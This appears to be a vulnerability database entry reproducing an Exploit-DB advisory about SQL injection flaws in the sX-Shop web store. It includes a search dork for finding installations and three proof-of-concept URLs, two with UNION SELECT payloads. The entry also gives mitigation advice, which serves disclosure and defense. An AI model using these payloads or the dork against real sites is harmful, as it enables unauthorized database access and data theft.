sX-Shop SQL Injection Vulnerabilities

vendor:

sX-Shop

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: sX-Shop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

sX-Shop SQL Injection Vulnerabilities

sX-Shop is vulnerable to SQL injection. An attacker can inject malicious SQL queries via the 'product' and 'id' parameters in the 'index.php' and 'question.php' scripts, respectively. Additionally, the 'tell_a_friend.php' script is also vulnerable to SQL injection via the 'id' parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

########################################################################################

sX-Shop SQL Injection Vulnerabilities

########################################################################################

Author : CoBRa_21
Author Web Page :http://ipbul.org
Dork : "powered by sX-Shop"
Script Page : http://www.source-worx.de/

########################################################################################
 
Sql Injection :

http://localhost/[path]/index.php?product=_513' (Sql)
http://localhost/[path]/question.php?id=-513 union select version()  (Sql)
http://localhost/[path]/tell_a_friend.php?id=-500 union select version()  (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR
########################################################################################